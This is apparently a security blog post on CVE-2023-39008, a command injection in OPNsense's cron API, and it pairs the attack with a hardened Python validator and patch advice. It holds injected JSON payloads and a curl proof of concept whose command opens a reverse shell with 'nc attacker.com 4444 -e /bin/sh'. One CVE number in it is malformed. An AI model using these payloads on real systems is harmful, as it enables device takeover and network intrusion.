In July 2023, security researchers uncovered a significant vulnerability in OPNsense — the open-source firewall and routing platform widely used in both professional and home environments. This vulnerability, tracked as CVE-2023-39008, affects the API endpoint /api/cron/settings/setJob/ and enables attackers to execute arbitrary system commands if exploited correctly. In this deep dive, we’ll unravel how this bug works, look at specifics through code snippets, and demonstrate a proof-of-concept exploit.
What Is OPNsense, and Why Does CVE-2023-39008 Matter?
OPNsense is a firewall solution based on FreeBSD, providing lots of features through its web GUI and REST API. It’s used in schools, small businesses, and by security-conscious individuals at home. Any vulnerability which could allow command execution is a critical concern - once inside, an attacker could take over the device, steal data, or pivot into the internal network.
The bug sits in the API endpoint `/api/cron/settings/setJob/`.
This endpoint lets admins create and manage cron jobs from the web interface or remotely (for example, using API automation). It takes user input and, due to poor input sanitization, will sometimes pass that input directly to a shell command on the system.
How Does the Injection Happen?
Normally, the endpoint expects things like the command to execute ("what to run"), scheduling details, and a comment. However, it does not properly validate or sanitize the command field, allowing attackers to inject any extra commands as part of this input.
If a legitimate user sends this JSON POST data:
```json
{
  "command": "/usr/local/bin/some-legitimate-script.sh",
  "minute": "",
  "hour": "*",
  "day": "*",
  "month": "*",
  "weekday": "*",
  "description": "Routine job"
}
```
That’s safe. But an attacker could post this:
```json
{
  "command": "/usr/local/bin/some-legitimate-script.sh; whoami > /tmp/pwned",
  ...
}
```
The semicolon (;) tells the shell to run the next command (whoami > /tmp/pwned) after the script executes.
Below is an example code snippet showing how an attacker could exploit this using curl (the stray `;` after the URL in the original snippet would have ended the command early; it is removed here):
```shell
curl -k -X POST "https://<opnsense-device>/api/cron/settings/setJob/" \
  -H "Content-Type: application/json" \
  -H "Authorization: <APIKey>:<APISecret>" \
  -d '{
    "command": "ls / > /tmp/pwned; nc attacker.com 4444 -e /bin/sh",
    "minute": "",
    "hour": "*",
    "day": "*",
    "month": "*",
    "weekday": "*",
    "description": "malicious job"
  }'
```
Replace <opnsense-device> with the target, and <APIKey>:<APISecret> with credentials (see below regarding authentication).
If successful, this would schedule a cron job to run ls / > /tmp/pwned (directory listing goes to a file) and open an outbound reverse shell to the attacker's server.
Authentication Requirement
Important: This endpoint does require API credentials. This means a remote, unauthenticated attacker cannot exploit it directly unless:
- The credentials are leaked via another flaw (like CVE-202-27658).
- There’s an authenticated session via XSS or social engineering.
If the attacker gets API access, exploitation is trivial.
The vulnerable endpoint (in PHP) looks something like this (paraphrased for illustration):
```php
// Receive REST API input
$input = $request->getParsedBody();
$cmd = $input['command'];
// Build the cron line; the command field is concatenated verbatim
$cron_line = "{$input['minute']} {$input['hour']} ... {$cmd}";
// Write the cron line to the system crontab (the injection lands here)
file_put_contents('/etc/crontab', $cron_line, FILE_APPEND);
```
Notice that `$cmd` is used directly, with no validation, allowing injection.
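The hardened counterpart of the handler paraphrased above, as an added example written for this post rather than OPNsense's own code. It treats every field as untrusted: the five schedule fields must match cron syntax, the command must be an absolute path with arguments drawn from a strict character allowlist (so shell metacharacters such as `;`, `|`, `&`, `$`, backticks and redirections are rejected by construction rather than by a blocklist), and the description has newlines stripped so it cannot terminate the crontab line and start a second one. The `root` user column and the layout of the emitted line are assumptions for this example; note also that the sample JSON earlier in the post leaves `minute` empty, which a five-field crontab line cannot accept, so the validator rejects it.

```python
import re

# A single cron schedule field: "*", a number, a range, a list, or a step
# (e.g. "*", "*/15", "1-5", "0,30"). Numeric bounds are not checked here;
# the point is to exclude anything that is not cron syntax at all.
_FIELD_RE = re.compile(
    r"(\*|\d{1,2})(-\d{1,2})?(/\d{1,2})?"
    r"(,(\*|\d{1,2})(-\d{1,2})?(/\d{1,2})?)*"
)

# The command: an absolute path, then optional arguments made only of
# allowlisted characters. Shell metacharacters are simply not in the set,
# so "/usr/local/bin/x.sh; whoami > /tmp/pwned" fails at the ";".
_COMMAND_RE = re.compile(r"/[A-Za-z0-9._/-]+( [A-Za-z0-9._/=:@-]+)*")

SCHEDULE_FIELDS = ("minute", "hour", "day", "month", "weekday")


class InvalidJob(ValueError):
    """Raised when a submitted cron job fails validation."""


def validate_job(job: dict) -> dict:
    """Return a cleaned copy of the submitted job or raise InvalidJob."""
    cleaned = {}
    for name in SCHEDULE_FIELDS:
        value = str(job.get(name, ""))
        # fullmatch, not match: with match() a trailing "$" would still
        # accept a value ending in "\n", which is exactly a newline injection.
        if not _FIELD_RE.fullmatch(value):
            raise InvalidJob(f"bad schedule field {name!r}: {value!r}")
        cleaned[name] = value
    command = str(job.get("command", ""))
    if not _COMMAND_RE.fullmatch(command):
        raise InvalidJob(f"command rejected: {command!r}")
    cleaned["command"] = command
    # The description only becomes a comment, but a newline inside it would
    # end the comment and let the remainder be parsed as a new crontab entry.
    desc = str(job.get("description", ""))
    cleaned["description"] = desc.replace("\r", " ").replace("\n", " ").strip()
    return cleaned


def is_valid_job(job: dict) -> bool:
    """Convenience wrapper: True if validate_job accepts the job."""
    try:
        validate_job(job)
        return True
    except InvalidJob:
        return False


def build_cron_line(job: dict, user: str = "root") -> str:
    """Build the system-crontab text for one validated job (assumed format)."""
    c = validate_job(job)
    comment = f"# {c['description']}\n" if c["description"] else ""
    schedule = " ".join(c[name] for name in SCHEDULE_FIELDS)
    return f"{comment}{schedule} {user} {c['command']}"


if __name__ == "__main__":
    # Constructed inputs: the post's legitimate job (with a real minute value)
    # and the injected variant from the same section.
    good = {"command": "/usr/local/bin/some-legitimate-script.sh", "minute": "0",
            "hour": "*", "day": "*", "month": "*", "weekday": "*",
            "description": "Routine job"}
    bad = dict(good, command=good["command"] + "; whoami > /tmp/pwned")
    print(build_cron_line(good))
    print("injected job accepted?", is_valid_job(bad))
```

The allowlist is deliberately narrow; a real product would widen the argument character set to whatever its legitimate jobs need, but it should stay an allowlist. Blocklisting `;` alone would still leave `|`, `&&`, `$(...)` and newline as working separators.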
Fix & Mitigation
- Update: Fixed in OPNsense 23.7 (see the update announcement in the references below).
- Restrict API Access: IP whitelist API access to trusted networks only.
- Strong Credentials: Use long, random API keys/secrets. Disable unused accounts.
References
- Official OPNsense Security Advisory
- NVD CVE Entry
- OPNsense Update Announcement – 23.7 Released
- Packet Storm Security Advisory
Final Thoughts
CVE-2023-39008 is a textbook case of “command injection,” reminding us to always sanitize user input — especially when building automation or admin APIs! If you use OPNsense and haven’t patched, update immediately and check for any unusual cron jobs or activity.
Stay safe out there!
Timeline
Published on: 08/09/2023 19:15:00 UTC
Last modified on: 08/14/2023 14:13:00 UTC